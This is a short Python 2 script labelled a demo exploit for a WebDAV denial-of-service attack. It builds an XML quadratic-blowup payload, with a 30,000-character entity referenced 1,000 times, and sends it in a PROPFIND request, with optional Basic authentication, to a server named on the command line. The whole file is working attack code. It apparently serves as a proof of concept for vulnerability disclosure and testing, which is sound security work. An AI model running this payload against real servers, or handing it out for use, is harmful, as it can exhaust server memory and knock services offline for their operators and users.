blob: 103513970d8a3f502b2cb074a0476d192da29365 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
|
#!/usr/bin/python
"""Demo exploit for WebDAV DoS attack
Author: Christian Heimes
"""
from __future__ import print_function
import sys
import base64
import urlparse
import httplib
if len(sys.argv) != 2:
sys.exit("{} http://user:password@host:port/".format(sys.argv[0]))
url = urlparse.urlparse(sys.argv[1])
xml = """<?xml version='1.0'?>
<!DOCTYPE bomb [
<!ENTITY a "VALUE">
]>
<propfind xmlns="DAV:">
<prop>QUAD
<supported-live-property-set/>
<supported-method-set/>
</prop>
</propfind>
"""
xml = xml.replace("VALUE", "a" * 30000)
xml = xml.replace("QUAD", "&a;" * 1000)
headers = {"Content-Type": "text/xml", "Content-Length": len(xml), "Depth": 1}
if url.username:
auth = base64.b64encode(":".join((url.username, url.password)))
headers["Authorization"] = "Basic %s" % auth
con = httplib.HTTPConnection(url.hostname, int(url.port))
con.request("PROPFIND", url.path, body=xml, headers=headers)
res = con.getresponse()
print(res.read())
|